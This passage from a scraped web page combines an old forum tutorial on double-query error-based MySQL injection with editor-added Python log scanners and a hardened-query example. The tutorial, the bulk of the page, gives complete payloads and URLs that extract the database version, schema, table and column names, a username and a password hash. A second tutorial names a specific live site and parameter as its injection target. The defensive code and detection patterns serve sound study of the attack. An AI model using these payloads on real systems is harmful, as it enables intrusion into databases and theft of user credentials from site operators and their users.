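    """Decode the query string and flatten what hides keywords from a naive
    grep: percent-encoding (applied twice for double encoding), inline
    comments, mixed case and runs of whitespace."""
    query = url.split("?", 1)[1] if "?" in url else ""
    decoded = unquote_plus(unquote_plus(query)).lower()
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).strip()


def score_request(url):
    """Return (score, [matched signature names]) for one request URL."""
    q = normalize_query(url)
    hits = [name for name, (rx, _) in SIGNATURES.items() if rx.search(q)]
    return sum(SIGNATURES[name][1] for name in hits), hits


def scan_access_log(lines):
    """One finding per request whose signature score reaches the threshold."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than crash
        score, hits = score_request(m.group("url"))
        if score >= ALERT_THRESHOLD:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "url": m.group("url"), "score": score, "hits": hits})
    return findings


def leaked_values(body):
    """Values a duplicate-key error exposes in a response body; seeing one
    confirms the probe worked and that the page echoes MySQL errors."""
    return [m.group("value") for m in DUP_ENTRY_RE.finditer(body)]


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']} score={f['score']} hits={','.join(f['hits'])}")
    print("leaked:", leaked_values(SAMPLE_RESPONSE))
```

The weights are a starting point, not a tuned ruleset: the order-by probe alone is too common in benign traffic to alert on, so it only reaches the threshold together with a comment tail, while floor(rand(0)*2) under a group by is specific enough to alert on its own.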
<div align="center" style="background-color: #282828; color: #cccccc; font-family: Verdana, Helvetica, sans-serif; font-size: 13px; line-height: 18.078125px;">
<br />Short explanation:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Now I haven't been explaining this so well; I will take my time to make this clear to you.<br />This method is almost exactly the same as error based, but it uses two queries in one statement: an inner subquery that fetches the value we want, nested inside a count(*) ... group by floor(rand(0)*2) query whose grouping key collides, so MySQL raises a "Duplicate entry" error that carries our value.<br />This way it makes the database respond with the things we ask.<br />You can see this as overloading someone with so much information that he has no other choice than to give the answer.</span><br /><br /><span class="bbc_color" style="color: orange;">Get the MySQL Version.</span><br /><br />Before you work your way up to the end of this tutorial, take a look at the query below and at the one from error based injection.<br />There is a lot of difference between the queries; don't mix them up.<br /><br />Our query for the version (double query):<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />Now what does this extremely large query tell us?<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Yet again we join several values with concat(), and in the double query we cast version() as char so it ends up in the error text.<br />The outer select runs against information_schema.tables (a database that always exists), and we add "and 1=1" at the end of our query so it returns true.</span><br /><br />Error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '5.1.65-cll' for key 1</code><br />It is a must to keep your queries clean; therefore, yet again, I advise the Hackbar, because one thing wrong results in an error without information.<br />We don't want that to happen, do we :). Let us get the database name.<br /><br /><span class="bbc_color" style="color: orange;">Get the Database Name.</span><br /><br />This is our query to get the database names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />As you have seen in error based, the LIMIT here is important if you want to get all database names.<br /><br />I won't be explaining everything as I usually do; I'll add what is new. This really reduces my writing time.<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">Here we select schema_name (the database name) cast as characters. With LIMIT 0,1 you get only the first one; increase the first number (LIMIT 1,1, LIMIT 2,1, ...) to get all database names.</span><br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'Ignotus_1' for key 1</code>Our database is Ignotus_1. Now it's important to write down the database name.<br /><br /><br /><span class="bbc_color" style="color: orange;">Get the Table Names.</span><br /><br /><br />Same as in error based, the queries become more difficult as we advance! Pay attention and you will pick this up.<br /><br />!!Where it says 0x<span class="bbc_color" style="color: orange;">Ignotus_1</span> we need to add the database name in HEX. The 0x in front is IMPORTANT!!<br />Our query to extract our table names:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xIgnotus_1 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />As we have learned a few times now, the LIMIT will get us all tables. Keep increasing the first limit in the query (the one right after our database name in HEX) until you have all tables.<br /><br />Short explanation of what's new in our query:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We again want the table names cast as characters, shown in our error output.<br />The "Where table_schema=..." clause restricts the lookup to our database, and the LIMIT walks through its tables one at a time.</span><br /><br />Now you should have a list of table names; look for a useful one.<br />Mine is USERS. Same as with error based, we now want the column names of that table.<br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'USERS' for key 1</code><br /><br /><span class="bbc_color" style="color: orange;">Get the Column Names.</span><br /><br />!!Here we have to edit a few things again. Where it says 0x<span class="bbc_color" style="color: orange;">Ignotus_1</span>, put your database name in HEX.<br />And where it says 0x<span class="bbc_color" style="color: orange;">USERS</span>, put the table name you are going to use, also in HEX; don't forget the 0x has to be there in order for MySQL to read it as a hex string literal. !!<br /><br />Another mind-blowing query for extracting the columns:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0xIgnotus_1 AND table_name=0xUSERS LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />Yet again there is a LIMIT, the first one after our database name in HEX; if we increase that limit we will get all columns.<br /><br />Short explanation of our new vector:<br /><span class="bbc_size" style="font-size: 8pt; line-height: 1.4em;">We want the column names from information_schema.columns, filtered by our database name (in hex) and by the table we chose (also in hex).</span><br /><br />Error code:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'Usernames' for key 1</code><br />Second error, after increasing the limit:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'Passwords' for key 1</code><br />Now we want to extract all the info we can get from these columns: Username and Password.<br /><br /><span class="bbc_color" style="color: orange;">Extracting Information from the Columns.</span><br /><br />Finally, finally and finally we are getting to an end; I am getting bored writing anyway!<br />This is the part where we all know we get what we want!<br /><br />!!First of all, a little bit of changing needs to be done in our query again!<br />Where it says <span class="bbc_color" style="color: orange;">USERS</span>.<span class="bbc_color" style="color: green;">Username</span> is where you put your table name and then your column name.<br />Yes, this time we need two queries in order to get Username and Password. And where it says <span class="bbc_color" style="color: orange;">Ignotus_1</span> (written as `database_name` in the query below) we put our database name, not in hex this time.!!<br /><br />This is our query to extract all data from our columns:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code>In URL:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">http://www.[site].com/page.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(USERS.Username as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1</code><br />Error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry 'uSploit' for key 1</code><br />Now for our passwords we only need to change Username into Passwords and execute.<br />This will result in an error providing us the password.<br /><br />Error message:<br /><div class="codeheader" style="color: #666666; font-size: x-small; font-weight: bold; padding: 0px 0.3em;">
Code:</div>
<code class="bbc_code" style="background-color: #2b2b2b; background-position: initial initial; background-repeat: initial initial; border-bottom-color: rgb(27, 27, 27); border-bottom-style: solid; border-bottom-width: 2px; border-top-color: rgb(27, 27, 27); border-top-style: solid; border-top-width: 2px; display: block; font-family: 'courier new', monaco, 'lucida console', monospace; font-size: 11px; line-height: 1.5em; max-height: 24em; overflow: auto; padding: 3px 1em; white-space: pre;">Duplicate entry '4c0e8eb3ed67f58dc56e724e5297a598n' for key 1</code><br />Username: uSploit<br />Password: 4c0e8eb3ed67f58dc56e724e5297a598n<br /><br />That is enough ass hurting for today.<br />Thanks for taking your time, hope you enjoyed!<br /></div>
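The five steps above all share one signature on the wire: a count(*) ... group by floor(rand(0)*2) wrapper around an information_schema lookup, followed by "and 1=1", and every one of them makes the server answer with an error page. The following Python scanner is an added example from the editor, not code from the tutorial: it URL-decodes the request target of each web-server access-log line and flags requests that carry those fingerprints. The log lines, the IP addresses (from the documentation ranges), the indicator names and the "three indicators" threshold are all constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format); the third request carries the
# double-query version probe from the tutorial, URL-encoded the way a browser would send it.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Sep/2013:23:06:15 -0700] "GET /page.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Sep/2013:23:06:16 -0700] "GET /page.php?id=1%27 HTTP/1.1" 500 210
203.0.113.5 - - [04/Sep/2013:23:06:17 -0700] "GET /page.php?id=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,cast(version()%20as%20char),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 500 260
198.51.100.9 - - [04/Sep/2013:23:07:01 -0700] "GET /page.php?id=2 HTTP/1.1" 200 4980
"""

# The parts of a combined log line we need: client IP, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Fingerprints of the duplicate-entry technique, matched case-insensitively against the
# decoded request target. The names are our own labels, not MySQL terms.
INDICATORS = {
    "rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "group_by": re.compile(r"\bgroup\s+by\b", re.I),
    "count_star": re.compile(r"\bcount\s*\(\s*\*\s*\)", re.I),
    "info_schema": re.compile(r"\binformation_schema\.", re.I),
    "concat_hex": re.compile(r"\bconcat\s*\(.*\b0x[0-9a-f]+", re.I),
    "and_1_eq_1": re.compile(r"\band\s+1\s*=\s*1\b", re.I),
}


def decode_target(target: str) -> str:
    """URL-decode twice: double-encoded payloads unwrap, already-clean text is unchanged."""
    return unquote_plus(unquote_plus(target))


def classify(target: str):
    """Return (verdict, matched indicator names) for one request target."""
    decoded = decode_target(target)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    # rand() together with GROUP BY is the core of the duplicate-entry trick and is
    # enough on its own; otherwise require three independent indicators to cut noise.
    if "rand_groupby" in hits and "group_by" in hits:
        return "error-based-sqli", hits
    if len(hits) >= 3:
        return "suspicious", hits
    return "benign", hits


def scan_log(text: str):
    """Parse every line, classify its request and return the non-benign findings."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-access line: skip rather than crash the scan
        verdict, hits = classify(m["target"])
        if verdict != "benign":
            findings.append({
                "ip": m["ip"],
                "status": m["status"],
                "verdict": verdict,
                "indicators": hits,
                "target": m["target"],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["verdict"], ",".join(f["indicators"]))
```

Pattern matching like this catches the textbook payloads and is cheap to run over existing logs; it does not catch a payload rewritten with inline comments or other encodings, so pair it with a second signal the technique cannot hide, a burst of HTTP 500 responses on one parameter from one client, and treat the application's own "Duplicate entry" error text as something that must never reach the browser in the first place.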
</div>
[TUTORIAL]UNION-ERROR BASED SQLI A.K.A ERROR BASED TYPE 2 (posted by Fahim, 2013-09-04)<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">Hey guys,</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">It's Zer0 and I'll be explaining another type of Error Based SQL injection.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">So let's get started</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">In this example we're gonna be using this site (which a member asked about in -Downfall's thread):</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/</code></div>
</div>
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">The vulnerable link would be:</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">http://www.seenpm.org/new/index.php?id=151'</code></div>
</div>
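A link that breaks on a single trailing quote, like the index.php?id=151' above, means the id parameter is pasted straight into the SQL text and the resulting database error is printed back into the page; every query in this post depends on that second half. The following Python/SQLite code is an added example from the editor, not code from the post or the site: a constructed news table stands in for the site's unknown schema, the function names are ours, and it puts the vulnerable lookup next to a hardened one that validates the id, binds it as a parameter and returns a generic message instead of the driver's error text.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the site's article table; the real schema is unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?, ?)",
        [(150, "Old story", 1), (151, "Story 151", 1), (152, "Unpublished draft", 0)],
    )
    return conn


def get_news_vulnerable(conn, raw_id: str):
    """Mirrors the flaw behind index.php?id=151': the raw parameter becomes part of the SQL."""
    sql = "SELECT id, title FROM news WHERE published = 1 AND id = " + raw_id
    return conn.execute(sql).fetchall()


def leaks_db_error(conn, raw_id: str):
    """The error text a page with error display on would print for the vulnerable version, or None."""
    try:
        get_news_vulnerable(conn, raw_id)
    except sqlite3.Error as exc:
        return str(exc)  # e.g. unrecognized token: "'"  -- this text is the attacker's oracle
    return None


def get_news_hardened(conn, raw_id: str):
    """Validate the type, bind the value, and never hand database error text to the client."""
    try:
        news_id = int(raw_id)  # "151" passes; "151'" and "151 OR 1=1" are rejected here
    except ValueError:
        return {"error": "invalid id"}
    try:
        rows = conn.execute(
            "SELECT id, title FROM news WHERE published = 1 AND id = ?", (news_id,)
        ).fetchall()
    except sqlite3.Error:
        # Log the real exception server-side; the client only ever sees a generic message.
        return {"error": "temporary failure"}
    return {"rows": rows}


if __name__ == "__main__":
    db = make_db()
    # The injected OR bypasses the published = 1 filter and returns the draft as well.
    print("vulnerable, id=151 OR 1=1 ->", get_news_vulnerable(db, "151 OR 1=1"))
    print("vulnerable, id=151'       ->", leaks_db_error(db, "151'"))
    print("hardened,   id=151'       ->", get_news_hardened(db, "151'"))
    print("hardened,   id=151        ->", get_news_hardened(db, "151"))
```

In PHP the same split is a prepared statement (mysqli or PDO with bound parameters) plus display_errors turned off in production; the "Duplicate entry" messages quoted throughout these posts only reach the browser because the application echoes the database error text into the page.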
<br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; font-weight: bold; line-height: 19.1875px; margin: 0px; padding: 0px;">Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully</span><br />
<div class="codeblock" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;">
<div class="title" style="margin: 0px; padding: 0px;">
Code:</div>
<div class="body" dir="ltr" style="margin: 0px; padding: 0px;">
<code style="border-color: rgba(255, 255, 255, 0.027451); border-style: solid; border-width: 2px 2px 2px 20px; display: block; line-height: 1.6em; margin: 0px auto; padding: 2px 15px;">count(*) = Returns the total number of rows in the table/view<br style="margin: 0px; padding: 0px;" />group by = Groups the result set by one or more columns (rows with the same key land in one group)<br style="margin: 0px; padding: 0px;" />concat = Joins several values into one string, so several results show up in one column<br style="margin: 0px; padding: 0px;" />information_schema = MySQL's built-in metadata database, which lists every schema, table and column<br style="margin: 0px; padding: 0px;" />table_schema = The database a table belongs to<br style="margin: 0px; padding: 0px;" />table_name = The name of a table<br style="margin: 0px; padding: 0px;" />limit = Restricts how many rows are returned (LIMIT offset,count)<br style="margin: 0px; padding: 0px;" />mid() = Extracts a substring from a text field</code></div>
</div>
<span style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px;">See more of the functions here:</span><br style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" /><a href="http://www.w3schools.com/sql/sql_functions.asp" style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">http://www.w3schools.com/sql/sql_functions.asp</a><br />
<hr style="background-color: rgba(0, 0, 0, 0.2); font-family: 'lucida grande', tahoma, verdana, arial, sans-serif; font-size: 12px; line-height: 19.1875px; margin: 0px; padding: 0px;" />
